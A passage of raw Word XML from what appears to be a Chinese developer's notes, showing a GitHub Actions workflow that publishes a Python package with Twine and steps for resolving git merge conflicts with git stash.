          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662411C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># This workflow will upload a Python Package using Twine when a release is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02688C8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># For more information see: https://help.github.com/en/actions/language-and-framework-guides/using-python-with-github-actions#publishing-to-package-registries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE45AE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768048C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name: Upload Python Package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274EA9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A59474D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E112CA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  release:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA56FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    types: [created]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6017DF5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE08FC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8D0CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  deploy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F7747" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723FD613" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    runs-on: ubuntu-latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16049DB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A22AD2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5A6653" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    - uses: actions/checkout@v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1442DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    - name: Set up Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655E16B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      uses: actions/setup-python@v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B58424" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B0A62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        python-version: '3.x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA1902" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    - name: Install dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE3F8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      run: |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968547E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        python -m pip install --upgrade pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E4AED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        pip install setuptools wheel twine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D482E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    - name: Build and publish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296DDA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      env:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C17049" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD71AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FE7C19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      run: |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEB8FCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        python setup.py sdist bdist_wheel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F827E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        twine upload dist/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1EA100" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11137B08" w14:textId="2D39A3D6" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174F2176" w14:textId="4F898080" w:rsidR="005F2EC3" w:rsidRDefault="005F2EC3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc159779517"/>
      <w:r w:rsidRPr="005F2EC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git pull</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2EC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候发生冲突的解决方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="3363A977" w14:textId="1D5C5050" w:rsidR="004C452C" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示冲突</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7D652" w14:textId="5A2587E6" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CDB7917" wp14:editId="76E37505">
            <wp:extent cx="5274310" cy="2170430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84388440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84401" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2170430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D33498C" w14:textId="784E0CE6" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在源文件中看到标记的冲突的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HEAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C38262" w14:textId="163FA6AA" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22E98101" wp14:editId="5CF96B03">
            <wp:extent cx="5274310" cy="2677160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1166763417" name="图片 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63417" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2677160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B40C224" w14:textId="7BC8F4BB" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改完在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git add . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E924D" w14:textId="77777777" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3449274E" w14:textId="0AB4447E" w:rsidR="00DA63AB" w:rsidRPr="00CC392C" w:rsidRDefault="009238AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC392C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果没有实质差异，“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC392C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>current change</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC392C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”是你的修改的，那个</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC392C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>commit id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC392C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的是已存在的，按照已存在的来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB85E6" w14:textId="77777777" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22BEDEEB" w14:textId="77777777" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7052359E" w14:textId="77777777" w:rsidR="00DA63AB" w:rsidRDefault="00DA63AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F55A59C" w14:textId="6BDBA540" w:rsidR="005F2EC3" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git pull</w:t>
      </w:r>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候发生冲突的解决方法之“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>error: Your local changes to the following files would be overwritten by merge</w:t>
      </w:r>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA4E60" w14:textId="0B8D95DD" w:rsidR="005F2EC3" w:rsidRDefault="005F2EC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AAE1D6" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>From http://192.168.3.67:8888/gaopeng/sca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6B612" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">   3157e3c..0360411  master     -&gt; origin/master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A39685" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Updating 6bd301b..0360411</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD25F2F" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>error: Your local changes to the following files would be overwritten by merge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A5315" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        threat/component/huaweicloud-mirror-download/main-huaweicloud-mvn-spider_mirrors_download_jar_and_pom.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7231A1" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        threat/component/huaweicloud-mirror/main-huaweicloud-mvn-spider_with_pom_and_meta_to_oss_components_maven.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6E7FE" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        threat/vulnerability/snyk-vul-spider/main_snyk.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435EFAE0" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        threat/vulnerability/snyk-vul-spider/snyk_data_analyse.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCB4A07" w14:textId="77777777" w:rsidR="00E716B4" w:rsidRPr="00E716B4" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Please commit your changes or stash them before you merge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BB02B8" w14:textId="6AE3C289" w:rsidR="005F2EC3" w:rsidRDefault="00E716B4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E716B4">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Aborting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EA39B1" w14:textId="77777777" w:rsidR="005F2EC3" w:rsidRDefault="005F2EC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1565ABA9" w14:textId="3EA6B564" w:rsidR="005F2EC3" w:rsidRDefault="008D25CA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc159779518"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="6AB6FD79" w14:textId="7AC47652" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git stash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09270B50" w14:textId="2B97640B" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E9B54F" w14:textId="1709B8A6" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>git stash pop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD68D8" w14:textId="77777777" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一下此文件看看自动合并的情况，并作出相应修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C1BCF" w14:textId="77777777" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9398E9" w14:textId="77777777" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git stash: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份当前的工作区的内容，从最近的一次提交中读取相关内容，让工作区保证和上次提交的内容一致。同时，将当前的工作区内容保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125DEBC7" w14:textId="77777777" w:rsidR="00956363" w:rsidRDefault="00956363" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git stash pop: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r>
